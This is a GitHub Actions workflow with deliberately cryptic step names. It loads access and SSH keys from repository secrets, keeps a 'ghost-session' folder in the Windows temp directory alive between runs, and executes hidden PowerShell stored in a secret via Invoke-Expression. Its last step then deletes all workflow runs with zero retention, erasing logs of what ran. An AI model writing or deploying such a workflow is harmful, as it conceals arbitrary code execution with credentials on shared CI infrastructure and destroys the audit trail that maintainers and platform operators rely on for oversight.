name: weearefinallyfree

on:
  workflow_dispatch:

jobs:
  weearefinallyawake:
    runs-on: windows-latest
    permissions:
      actions: write
      contents: read

    steps:
      - name: r1dex
        uses: actions/checkout@v4
        
      - name: r2dex
        uses: actions/cache@v4
        with:
          path: |
            C:\Windows\Temp\app_sessions
          key: ${{ runner.os }}-ghost-session-${{ github.run_id }}
          restore-keys: |
            ${{ runner.os }}-ghost-session-

      - name: r3dex
        shell: powershell
        env:
          A_KEY: ${{ secrets.ACCESS_KEY }}
          SSH_KEY: ${{ secrets.SSH_KEY }}
          LETS_GO: ${{ secrets.R4DX_EXECUTE }}
        run: |
          Invoke-Expression $env:LETS_GO
          
      - name: rXdex
        uses: Mattraks/delete-workflow-runs@v2
        if: always()
        with:
          token: ${{ github.token }}
          repository: ${{ github.repository }}
          retain_days: 0
          keep_minimum_runs: 0
